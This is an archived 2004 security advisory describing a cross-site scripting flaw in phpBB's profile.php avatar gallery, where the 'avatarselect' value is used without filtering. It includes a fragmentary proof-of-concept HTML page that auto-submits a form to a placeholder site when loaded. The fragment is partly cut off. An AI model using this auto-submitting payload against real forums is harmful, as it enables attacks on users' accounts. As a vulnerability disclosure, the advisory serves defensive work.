Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: hack3693.htm

phpBB profile.php Cross Site Scripting Vulnerability



phpBB profile.php Cross Site Scripting Vulnerability





#####################################################################



 Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability

  Release Date : Mar 21,2004 

   Application : phpBB

       Version : phpBB 2.0.6d or others?

      Platform : PHP

    Vendor URL : http://www.phpbb.com/ 

        Author : Cheng Peng Su(apple_soup_at_msn.com)

     

#####################################################################



 Proof of Conecpt:

  

     This vuln is in profile.php,when you click [Show Gallery],phpBB 

  will show you Avatar gallery,asking you to choose one for yourself.

  The hole is in the form,after submitting phpBB will use the value of 

  "avatarselect" as the path of the gallery directly,without filtering

  any illegal characters.

   

 Exploit:

  

  -------------exploit.htm--------------

  
action="http://site/profile.php?mode=editprofile" method="post">
<script> window.onload=function() { document.all.submitavatar.click(); } </script> ---------------end------------------- Contact: Cheng Peng Su Class 1,Senior 2,High school attached to Wuhan University Wuhan,Hubei,China(430072) apple_soup_at_msn.com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH